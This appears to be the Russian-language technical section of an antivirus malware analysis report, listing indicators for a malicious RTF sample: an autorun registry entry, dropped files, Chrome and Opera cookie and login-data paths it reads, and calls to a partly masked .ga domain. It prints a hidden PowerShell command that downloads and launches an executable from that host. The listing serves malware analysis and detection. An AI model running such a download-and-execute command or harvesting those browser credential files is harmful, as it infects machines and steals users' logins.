Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'DeviceId' = 'C:\InstallC113\DeviceId.exe'
- http://au###etup.ga/1/adb.zip как %appdata%\adb.exe
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\adb.exe
- C:\installc113\deviceid.exe
- <Текущая директория>\~wrd0000.tmp
- C:\installc113\sqlite.interop.dll
- %TEMP%\tmpf056.tmp
- %TEMP%\tmpf18f.tmp
- %TEMP%\tmpf21d.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- %TEMP%\tmpf056.tmp
- %TEMP%\tmpf18f.tmp
- %TEMP%\tmpf21d.tmp
- <PATH_SAMPLE>.rtf
- 'au###etup.ga':80
- http://au###etup.ga/SQLite.Interop.dll
- DNS ASK au###etup.ga
- 'C:\installc113\deviceid.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://au###etup.ga/1/adb.zip','%APPDATA%\adb.exe');Start-Process '%APPDATA%\...' (со скрытым окном)
- '%APPDATA%\adb.exe'